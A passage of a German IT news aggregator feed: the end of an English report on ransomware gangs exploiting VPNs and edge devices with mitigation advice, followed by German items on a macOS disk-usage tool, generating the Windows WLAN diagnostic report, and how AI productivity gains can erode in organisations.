<p class="wp-block-paragraph">Check Point warned in June of <a href="https://www.csoonline.com/article/4182898/check-point-warns-of-ransomware-linked-attacks-exploiting-outdated-vpn-protocol.html">ransomware attacks against VPNs</a> that still use the deprecated Internet Key Exchange version 1 (IKEv1) protocol. Citrix issued patches in early July for a <a href="https://www.csoonline.com/article/4192741/new-citrixbleed-like-netscaler-flaw-sees-exploit-attempts-in-the-wild.html">CitrixBleed-like flaw</a> in its NetScalar devices that had come under attack.</p>



<p class="wp-block-paragraph">Meanwhile, Fortibleed, a massive credential-compromise campaign, <a href="https://www.csoonline.com/article/4186790/fortibleed-campaign-exposes-75000-fortinet-firewalls-worldwide.html">exposed 75,000 FortiGate firewalls in June</a>.  </p>



<p class="wp-block-paragraph">Qilin is by no means alone in increasing its operations against VPNs and other network security tools.</p>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/4178580/the-gentlemen-are-coming-for-your-files-and-then-your-network.html">The Gentlemen</a>, No. 2 on NCC Group’s list with 238 victims in Q2 2026, is noted for breaking into organizations through firewalls, VPNs, and other internet-exposed systems — FortiGate and Cisco products in particular.</p>



<p class="wp-block-paragraph">Akira, No. 4 on NCC Group’s list (127 victims), is also known for exploiting VPN vulnerabilities and abusing legitimate credentials, primarily versus <a href="https://www.twinstrata.com/news/akira-ransomware/">products from Ivanti, Cisco, and Fortinet</a>.</p>



<h2 class="wp-block-heading">In the line of fire</h2>



<p class="wp-block-paragraph">Network edge security devices are becoming security liabilities for enterprise security professionals, with an alarming rise in zero-day exploits arising from what experts describe as <a href="https://www.csoonline.com/article/4074945/network-security-devices-endanger-orgs-with-90s-era-flaws.html">basic and readily preventable vulnerabilities</a>.</p>



<p class="wp-block-paragraph">A range of attackers spanning opportunistic hackers to ransomware-as-a-service operators and nation-state sponsored APT (advanced persistent threat) groups are actively exploiting software vulnerabilities in edge devices to hack into corporate networks.</p>



<p class="wp-block-paragraph">“Although there has not been a material rise in ransomware volume in the last quarter, the trajectory of attacks continues upwards, and VPNs remain an increasingly attractive target,” said Matt Hull, VP and head of cyber intelligence and response at NCC Group.</p>



<p class="wp-block-paragraph">Unpatched vulnerabilities in edge devices are far from the only software bugs fueling ransomware attacks. For example, last year the <a href="https://www.csoonline.com/article/4068379/oracle-issues-emergency-patch-for-zero-day-flaw-exploited-by-cl0p-ransomware-gang.html">Clop ransomware gang hacked hundreds of companies</a> by exploiting zero-day vulnerabilities in Oracle’s E-Business Suite software.</p>



<h2 class="wp-block-heading">Edge of darkness</h2>



<p class="wp-block-paragraph">VPNs and other internet-facing edge devices remain prime targets for ransomware operators because they provide a direct route into an organization’s network.</p>



<p class="wp-block-paragraph">“Attackers may exploit an unpatched vulnerability, use stolen credentials, or target weak authentication controls,” said Alexander Leslie, a senior advisor at cyber threat intelligence firm Recorded Future. “In some cases, exploitation begins before organizations have had sufficient time to apply vendor guidance, leaving security teams with a very narrow window to respond.”</p>



<p class="wp-block-paragraph">VPN exploitation sits alongside other initial access methods, such as phishing, compromised credentials, or software supply chain attacks. The preferred attacker infiltration method varies by campaign and sector but locating security in edge devices carry particular advantages from the perspective of attackers.</p>



<p class="wp-block-paragraph">“Vulnerabilities in perimeter devices are particularly valuable to attackers because those systems are continuously exposed to the internet and can provide privileged access while bypassing some endpoint controls,” said Leslie.</p>



<p class="wp-block-paragraph">Dray Agha, senior manager of security operations at managed detection and response firm Huntress, backed up this assessment that exploiting internet-facing VPNs and edge devices remains the “dominant, volume-driven tactic” for ransomware operators because these appliances offer a “direct, publicly accessible gateway straight into the heart of corporate networks.”</p>



<p class="wp-block-paragraph">Rather than exploiting vulnerabilities in edge devices, attackers more commonly use internet-facing gateways as a means to abuse stolen credentials to break into corporate networks, according to Huntress.</p>



<p class="wp-block-paragraph">“What we see at Huntress is that the VPN is the site of initial access some 70% of the time, for advanced threat actors,” said Agha. “Overwhelmingly, however, they are not exploiting for access; rather they are using stolen credentials to authenticate to non-MFA’d [multi-factor authentication] user accounts.”</p>



<h2 class="wp-block-heading">Hardened perimeter</h2>



<p class="wp-block-paragraph">CSOs should treat their network perimeter as hostile territory by enforcing aggressive patch management, applying critical edge device updates within 24 to 48 hours, and mandating strict MFA for all access.</p>



<p class="wp-block-paragraph">Implementing zero-trust network segmentation to trap attackers and prevent lateral movement if the initial gateway is compromised also helps in making enterprise networks more resilient against attacks, Huntress’ Agha advised.</p>



<p class="wp-block-paragraph">Phishing-resistant multi-factor authentication, removal of unsupported systems, and close monitoring for unusual authentication or administrative activity also form key components in attack impact mitigation.</p>



<p class="wp-block-paragraph">Internet-facing assets that are known to be actively exploited should be prioritized as a patching priority.</p>



<p class="wp-block-paragraph">“Threat intelligence and evidence of active exploitation should help determine which vulnerabilities demand immediate action,” Recorded Future’s Leslie said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Speicherfresser unter macOS ausfindig machen]]></title>
<description><![CDATA[Speicherfresser unter macOS ausfindig machen

      
      
        
          
            
                



            
          
        
              
    
  Daniel Richey
Fr., 24.07.2026 - 07:00


            Wer aus der Windows-Welt Tools wie WinDirStat kennt, sucht auf dem Mac oft ve...]]></description>
<link>https://tsecurity.de/de/3690875/server/speicherfresser-unter-macos-ausfindig-machen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690875/server/speicherfresser-unter-macos-ausfindig-machen/</guid>
<pubDate>Fri, 24 Jul 2026 09:01:05 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Speicherfresser unter macOS ausfindig machen</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/tool-diskinv-x-macos-speicherplatz-analyse"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/tool-diskinventory-macos.jpg?itok=1dP5Lwv3" width="480" height="319" alt="Screenshot der macOS-Anwendung Disk Inventory X mit einer bunten Treemap-Grafik, links eine Dateiliste mit dem Programm iPhoto und dessen Unterordnern, rechts eine Farblegende der verschiedenen Dateitypen." title='Das klassische Treemap-Interface von Disk Inventory X lebt in "Disk Inventory Xs" für Apple Silicon weiter. (Quelle: derlien.com)' typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/104" lang about="https://www.it-administrator.de/user/104" typeof="schema:Person" property="schema:name" datatype class="username">Daniel Richey</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-07-24T07:00:00+02:00" title="Freitag, Juli 24, 2026 - 07:00" class="datetime">Fr., 24.07.2026 - 07:00</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Wer aus der Windows-Welt Tools wie WinDirStat kennt, sucht auf dem Mac oft vergeblich nach einem würdigen Pendant. Mit "Disk Inventory Xs" bekommt ein Klassiker aus den Nullerjahren jetzt endlich ein Update für Apple Silicon.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/tool-diskinv-x-macos-speicherplatz-analyse" rel="tag" title="Speicherfresser unter macOS ausfindig machen" hreflang="en">Weiterlesen<span class="visually-hidden"> über Speicherfresser unter macOS ausfindig machen</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So erstellen und verstehen Sie den WLAN-Report in Windows]]></title>
<description><![CDATA[Können Geräte keine Verbindung zum WLAN herstellen oder läuft die Datenübertragung plötzlich lediglich noch im Schneckentempo, ist die Ursache oftmals schwer zu bestimmen. Der Fehler kann an veralteten oder beschädigten Treibern liegen, an einem überlasteten oder falsch konfigurierten Router, an ...]]></description>
<link>https://tsecurity.de/de/3690806/windows-tipps/so-erstellen-und-verstehen-sie-den-wlan-report-in-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690806/windows-tipps/so-erstellen-und-verstehen-sie-den-wlan-report-in-windows/</guid>
<pubDate>Fri, 24 Jul 2026 08:18:32 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Können Geräte keine Verbindung zum WLAN herstellen oder läuft die Datenübertragung plötzlich lediglich noch im Schneckentempo, ist die Ursache oftmals schwer zu bestimmen. Der Fehler kann an veralteten oder beschädigten Treibern liegen, an einem überlasteten oder falsch konfigurierten Router, an Störsignalen durch benachbarte Funknetze oder daran, dass der Client zu weit vom Router entfernt ist. </p>



<p>Um sich einen Überblick über den WLAN-Status zu verschaffen und damit diese Probleme zu lösen, bringt Windows ein spezielles Tool mit: Es liefert Ihnen in Sekundenschnelle eine Übersicht zu Ihrem Netzwerk. Hierzu benötigen Sie die Kommandozeile oder Powershell: Starten Sie das gewünschte Eingabeprogramm, indem Sie in der Taskleiste in das Suchfeld Eingabeaufforderung oder Power shell eingeben. </p>



<p>Achten Sie darauf, dass der Treffer markiert ist und klicken Sie dann auf der rechten Seite auf „Als Administrator ausführen“. In der Eingabeaufforderung tippen Sie den Befehl netsh wlan show wlanreport ein und bestätigen mit Enter. Windows erzeugt nun den WLAN-Bericht und speichert ihn in der Datei „wlan-report-latest.html“ in dem Ordner „C:\ProgramData\Microsoft\Windows\WlanReport“. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6303a4dca32"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/eingabe_RGBeci.jpg?quality=50&amp;strip=all" alt="WLAN-Report" class="wp-image-3141217" width="592" height="465" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Nach Eingabe des netsh-Befehls erzeugt Windows einen Bericht zum aktuellen Status Ihres Funknetzwerks und führt dabei verschiedene Befehle aus.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Am besten markieren Sie diesen Pfad direkt in der Eingabeaufforderung mit der Maus und übernehmen ihn mit Strg-C in die Zwischenablage. Öffnen Sie danach das Suchfeld in der Taskleiste, kopieren Sie den Pfad mit Strg-V hinein und bestätigen Sie mittels Enter. Windows ruft nun Ihren Standardbrowser auf und lädt die HTML-Datei des Berichts. Falls das nicht funktioniert, steuern Sie den Ordner über den Explorer an. </p>



<p>Allerdings ist das Verzeichnis in den Standardeinstellungen versteckt – Sie müssen es zunächst über die Einstellungen des Explorers sichtbar machen. Klicken Sie anschließend doppelt auf die HTML-Datei, um sie im Browser zu öffnen. Im Bericht sehen Sie ganz oben eine Übersicht der WLAN-Ereignisse der letzten 48 Stunden. Sie können über einzelne Verbindungen mit der Maus fahren, um Details einzusehen. </p>



<p>Die Ereignisse sind mit farbigen Punkten und Buchstaben gekennzeichnet: Ein schwarzes X auf rotem Grund steht beispielsweise für einen Fehler, N zeigt an, dass die Verbindung zu einem WLAN unterbrochen wurde. Weiter unten finden Sie bei „Report Info“ das Datum, an dem der Bericht erzeugt wurde, sowie die Berichtsdauer. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6303a4dd34f"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/summary_RGBeci.jpg?quality=50&amp;strip=all" alt="WLAN-Report Summary" class="wp-image-3141218" width="926" height="527" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Im Summary des Berichts finden Sie Informationen zu Warnungen und fehlgeschlagenen beziehungsweise unterbrochenen Verbindungen zu Ihrem WLAN.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Darunter folgt die „General System Info“, die Details zur Hardware, zum Bios und zur Windows-Version verrät. Diese Daten können beispielsweise bei Kompatibilitätsproblemen helfen. Der Abschnitt „User Info“ nennt einige grundlegende Benutzerdaten: </p>



<p>Darunter finden Sie bei „Network Adapters“ die installierten Netzwerkadapter, und zwar sowohl den oder die Hardwareadapter sowie Softwareadapter, beispielsweise für eine VPN-Verbindung oder für Bluetooth und virtuelle Adapter. Bei „Script Output“ beginnt die Anzeige der Ausgabebildschirme von einigen Troubleshooting-Tools in Windows. </p>



<p>So liefert der Befehl ipconfig /all zum Beispiel Angaben zur aktuellen Netzwerkkonfiguration sämtlicher Adapter. Das Kommando netsh wlan show all ermittelt Daten zu den installierten Netzwerktreibern, Details zu Ihrem WLAN und den in der Vergangenheit genutzten Access Points. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6303a4ddb5b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/sessions_RGBeci.jpg?quality=50&amp;strip=all" alt="WLAN-Report Summary" class="wp-image-3141219" width="1024" height="768" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Am Schluss des Berichts sehen Sie einen Überblick über die WLAN-Sessions, die protokollierten Ereignisse mitsamt Uhrzeit und die dazugehörige Beschreibung.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Darüber hinaus führt Windows für den Bericht den Befehl certutil aus, der Ihnen weitere Einzelheiten über die verschiedenen WLAN-Profile präsentiert. Weiter unten folgt im Bereich „Summary“ ein Überblick über die erfolgreichen und die gescheiterten WLAN-Verbindungen. Dort nennt der Bericht auch die Gründe, warum beispielsweise der Kontakt zu einem WLAN verlorengegangen ist. </p>



<p>Diese Informationen sind oft besonders hilfreich, wenn es um die Fehlersuche im Netzwerk geht. Ganz am Schluss des Berichts steht der Abschnitt „Wireless Sessions“: Dort sind den WLAN-Adaptern unter anderem Informationen zur Verbindungsmethode und der SSID des WLAN zugeordnet. Des Weiteren stehen an dieser Stelle die Event-IDs und Beschreibungen der Ereignisse beim Aufbau der Verbindung. </p>



<p>Auch daraus lassen sich Schlussfolgerungen für die Lösung von Verbindungsproblemen ziehen.</p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/1152149/raffinierte-wlan-tools.html" target="_blank" rel="noreferrer noopener">Die besten Tools für WLAN &amp; Heimnetz</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hier erodiert die KI-Produktivität]]></title>
<description><![CDATA[Ob aus individuellen KI-Produktivitätsgewinnen auch eine performantere Organisation entsteht, hängt maßgeblich von der Gestaltung durch das Management ab.Gorodenkoff | shutterstock.com



Die Debatte über (generative) künstliche Intelligenz (KI) fokussiert sich meist auf die Produktivität des Ein...]]></description>
<link>https://tsecurity.de/de/3690658/it-security-nachrichten/hier-erodiert-die-ki-produktivitaet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690658/it-security-nachrichten/hier-erodiert-die-ki-produktivitaet/</guid>
<pubDate>Fri, 24 Jul 2026 06:08:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Gorodenkoff_shutterstock_2242410119_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Team Discussion 16z9" class="wp-image-4196516" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Ob aus individuellen KI-Produktivitätsgewinnen auch eine performantere Organisation entsteht, hängt maßgeblich von der Gestaltung durch das Management ab.</figcaption></figure><p class="imageCredit">Gorodenkoff | shutterstock.com</p></div>



<p class="wp-block-paragraph">Die Debatte über (generative) künstliche Intelligenz (KI) fokussiert sich meist auf die <a href="https://www.computerwoche.de/article/4160254/ki-liefert-endlich-produktivitatsgewinne-zumindest-im-homeoffice.html" target="_blank">Produktivität des Einzelnen</a> – und die Zahlen hierzu sind bemerkenswert. So zeigte ein großangelegtes <a href="https://www.hbs.edu/faculty/Pages/item.aspx?num=64700" target="_blank" rel="noreferrer noopener">Feldexperiment der Harvard Business School</a> in Zusammenarbeit mit der Boston Consulting Group, dass der Einsatz generativer KI bei Wissensaufgaben sowohl die Ergebnisqualität als auch die Bearbeitungsgeschwindigkeit signifikant verbessert. Dabei ist der Nivellierungseffekt besonders beachtlich:</p>



<ul class="wp-block-list">
<li>Während erfahrene Fachkräfte ihre Leistung um rund <strong>17 Prozent</strong> steigerten,</li>



<li>lagen die Verbesserungen bei den schwächeren Teilnehmern bei <strong>über 40 Prozent</strong>.</li>
</ul>



<p class="wp-block-paragraph">Diese individuellen Produktivitätsgewinne übertragen sich jedoch nicht automatisch in gleichem Maße auf die Organisationsebene. Unternehmen schaffen nicht bloß durch die isolierte Performance Einzelner Wert, sondern vor allem durch die Fähigkeit, Wissen zu bündeln, <a href="https://www.computerwoche.de/article/2805974/so-geht-schlechte-technologieentscheidung.html" target="_blank">komplexe Entscheidungen</a> zu treffen und gemeinsam Innovationen hervorzubringen. </p>



<p class="wp-block-paragraph">Wenn jedes Teammitglied zunehmend mit seinem eigenen KI-Assistenten interagiert, kann dies die Kernmechanismen erfolgreicher Zusammenarbeit beeinträchtigen. Die entscheidende Herausforderung besteht somit darin, den Zuwachs an individueller Produktivität in eine echte <a href="https://www.computerwoche.de/article/4146333/warum-unternehmen-nicht-ins-tun-kommen.html" target="_blank">organisatorische Leistungssteigerung</a> zu übersetzen.</p>



<h2 class="wp-block-heading">3 Produktivitäts-Bruchstellen im KI-Zeitalter</h2>



<p class="wp-block-paragraph">Ob aus temporären Effizienzgewinnen nachhaltige Wettbewerbsvorteile entstehen, hängt deshalb maßgeblich davon ab, wie <a href="https://www.computerwoche.de/article/4091252/ki-kann-den-chef-nicht-ersetzen.html" target="_blank">Führungskräfte</a> die folgenden drei Bruchstellen gestalten, die aufeinander aufbauen. Diese repräsentieren jene organisatorischen Übergänge, an denen individuelle Produktivitätsgewinne durch KI in kollektive Leistungsnachteile umschlagen können – wenn sie nicht aktiv gestaltet werden.</p>



<p class="wp-block-paragraph"><strong>1. Bruchstelle: Wissenssicherung</strong></p>



<p class="wp-block-paragraph">Der Weg zur Seniorität folgte lange einer stabilen Logik: Operative Erfahrung führte zu Expertise, diese wiederum zu Einfluss. Wer über mehr Wissen verfügte, übernahm komplexere Aufgaben und wurde zur zentralen Orientierungsperson im Team. Generative KI bricht diese Logik auf, da weniger erfahrene Mitarbeitende mithilfe von <a href="https://www.computerwoche.de/article/4096888/ki-ist-mehr-als-nur-ein-neues-tool.html" target="_blank">KI-Tools</a> heute Analysen, Konzepte und Problemlösungen in hoher Qualität erstellen können. Ein Teil des traditionellen Wissensvorsprungs erfahrener Kräfte verliert dadurch seine Exklusivität.</p>



<p class="wp-block-paragraph">Auf diese Weise gerät ein impliziter Erfolgsfaktor von Organisationen ins Wanken: der organische Wissenstransfer. Bislang floss Wissen primär über erfahrene Kräfte, was <a href="https://www.computerwoche.de/article/2827219/so-managen-sie-generationsunterschiede.html" target="_blank">Mentoring</a> und kollektives Lernen quasi „nebenbei“ sicherstellte. Fällt dieser Austausch weg, weil Aufgaben isoliert im Dialog mit der KI gelöst werden, besteht das Risiko eines doppelten Kompetenzverlusts:</p>



<ul class="wp-block-list">
<li><strong>Beschäftigte in Junior-Rollen</strong> können mithilfe von KI überzeugende Ergebnisse liefern, ohne den zugrundeliegenden Lösungsweg vollständig verstehen zu müssen. Der <a href="https://www.computerwoche.de/article/4066993/warum-junior-developer-unverzichtbar-bleiben.html" target="_blank">Lerneffekt</a> wird dadurch reduziert und die Fähigkeit zur eigenständigen Problemlösung sowie zur kritischen Validierung der KI-Ergebnisse eingeschränkt. Die Folge ist eine wachsende, unkritische Abhängigkeit von der Technologie.</li>



<li><strong>Erfahrene Fachkräfte</strong> laufen Gefahr, zur rein reaktiven Korrekturinstanz von KI-Ergebnissen zu werden. Ihre Erfahrung fließt dann nicht mehr aktiv in die Gestaltung ein, sondern beschränkt sich zunehmend auf die <a href="https://www.computerwoche.de/article/4158506/40-prozent-der-ki-produktivitatsgewinne-gehen-verloren.html" target="_blank">nachträgliche Qualitätskontrolle</a>. Mögliche Folgen sind <a href="https://www.computerwoche.de/article/2816175/so-motivieren-sie-softwareentwickler.html" target="_blank">Motivationsverlust</a>, mentaler Rückzug der Leistungsträger und der schleichende Verlust des in der Organisation vorhandenen Erfahrungswissens.</li>
</ul>



<p class="wp-block-paragraph">Um diesen doppelten Kompetenzverlust zu verhindern, müssen Führungskräfte den Rollenwandel der Seniorität aktiv gestalten. Künftig sollte sich diese nicht mehr primär über exklusives Fachwissen definieren, sondern über die Fähigkeit, die richtigen Fragen zu stellen, Zusammenhänge einzuordnen und Teams bei der kritischen Bewertung von KI-Ergebnissen anzuleiten. Diese Begleitung kann nicht erst im Rahmen der abschließenden Qualitätskontrolle erfolgen, sondern muss bereits <a href="https://www.computerwoche.de/article/4193038/der-data-scientist-ist-tot.html" target="_blank">während der Arbeit mit KI</a> ansetzen. </p>



<p class="wp-block-paragraph">Ziel ist es, Wissen, Erfahrungswerte und Kontext kontinuierlich zu vermitteln, die Urteilskraft der Junioren gezielt zu entwickeln und sie schrittweise zu einer eigenständigen Validierung und reflektierten Nutzung von KI-Ergebnissen zu befähigen.Gelingt dieser Rollenwandel nicht, können Teams zwar kurzfristig ihre individuelle Produktivität steigern, verlieren jedoch zunehmend das gemeinsame Verständnis für fachliche Zusammenhänge und den organisatorischen Kontext. </p>



<p class="wp-block-paragraph">Die durch KI erzielten Produktivitätsgewinne können dann durch Fehlentscheidungen, <a href="https://www.computerwoche.de/article/4184063/ki-betreuung-stiehlt-mitarbeitern-mehr-als-6-stunden-pro-woche.html" target="_blank">steigenden Korrekturaufwand</a> und einen schleichenden Qualitätsverlust auf Teamebene wieder aufgezehrt werden. Ohne die systematische Sicherung von Erfahrungswissen zu agieren, heißt, teure Fehler zu produzieren – nur deutlich schneller.</p>



<p class="wp-block-paragraph"><strong>2. Bruchstelle: Qualitätssicherung</strong></p>



<p class="wp-block-paragraph">Die Herausforderung endet jedoch nicht bei der Wissenssicherung. Sie betrifft im nächsten Schritt auch die Art und Weise, wie Teams die Qualität ihrer Entscheidungen absichern, wenn ein wachsender Teil der Analyse-, Bewertungs- und Wissensarbeit durch KI unterstützt wird. Je mehr Vorarbeit KI übernimmt, desto stärker hängt die Qualität organisatorischer Entscheidungen davon ab, die generierten Ergebnisse kritisch zu überprüfen und einzuordnen.</p>



<p class="wp-block-paragraph">Eine Besonderheit generativer KI besteht darin, dass ihre Leistungsfähigkeit keiner intuitiven Logik folgt. Die eingangs zitierte Studie beschreibt dieses Phänomen als „Jagged Technological Frontier“: KI-Systeme können bei bestimmten Aufgaben eine Performance auf Expertenniveau erreichen, während sie bei scheinbar ähnlichen Fragestellungen überraschend große Schwächen aufweisen. Die Grenzen dieser Leistungsfähigkeit sind jedoch nicht für jeden Nutzer ohne weiteres erkennbar.</p>



<p class="wp-block-paragraph">Genau daraus entstehen neue Herausforderungen für Führungskräfte: Mit der Integration von KI in den Arbeitsalltag steigt das Risiko des sogenannten “<a href="https://www.vdivde-it.de/sites/default/files/document/2026-Medizintechnik_Automation-Bias.pdf" target="_blank" rel="noreferrer noopener">Automation Bias</a>” (PDF), also der Tendenz, algorithmischen Empfehlungen unkritisch zu vertrauen. Die Gefahr liegt dabei selten in offensichtlichen Fehlern, sondern in plausiblen (aber falschen) Antworten, die überzeugend formuliert sind und deshalb ungeprüft übernommen werden.</p>



<p class="wp-block-paragraph">Zudem greift ein Beschleunigungseffekt: KI verkürzt den Weg von der Fragestellung bis zum Ergebnis erheblich und damit auch jene Diskussionen, mit denen Teams bislang die Qualität ihrer Entscheidungen abgesichert haben. Wo früher Analysen debattiert und Annahmen abgewogen wurden, liegt heute in Sekunden ein Resultat vor. Das eigentliche Risiko liegt dabei darin, dass Ergebnisse schneller entstehen als sie kritisch überprüft werden können. So ist es möglich, dass Produktivitätsgewinne mit einem Verlust an Ergebnisqualität einhergehen.</p>



<p class="wp-block-paragraph">Führungskräfte sollten daher Strukturen schaffen, die den Einsatz von KI transparent gestalten und Ergebnisse offen zur Diskussion stellen. KI-generierte Inhalte müssen denselben kritischen Maßstäben unterworfen werden wie die Arbeit eines erfahrenen Teammitglieds. Dazu benötigen Teams Validierungskompetenz, eine Verantwortungskultur und etablierte Prüfprozesse. Die entscheidende Frage sollte daher nicht sein, ob ein Ergebnis vom Menschen oder der Maschine stammt. Sondern, wer dieses auf fachliche Korrektheit überprüft und die Verantwortung für die darauf basierende Entscheidung übernimmt. </p>



<p class="wp-block-paragraph">KI steigert zwar die Geschwindigkeit – das wird jedoch erst dann zum echten Wettbewerbsvorteil, wenn es mit Urteilskraft und <a href="https://www.computerwoche.de/article/4194451/5-wege-zu-mehr-ki-accountability.html" target="_blank">gelebter Accountability</a> einhergeht.</p>



<p class="wp-block-paragraph"><strong>3. Bruchstelle: Innovationssicherung</strong></p>



<p class="wp-block-paragraph">Wie zuvor beschrieben, kann der Einsatz generativer KI gemeinsame Diskussionen verkürzen, was wiederum die <a href="https://www.computerwoche.de/article/3602602/wie-wird-man-innovativ.html" target="_blank">Innovationskraft</a> des Unternehmens belasten kann. KI liefert dabei nicht nur einen ersten Lösungsvorschlag, sondern erhöht zugleich die Wahrscheinlichkeit, dass sich Teams früh auf eine gemeinsame Richtung festlegen. Echte Innovationen entstehen jedoch selten durch schnelle Einigkeit: Sie entstehen durch produktive Reibung, tiefgehende Debatten und dadurch, etablierte Denkmuster zu hinterfragen.</p>



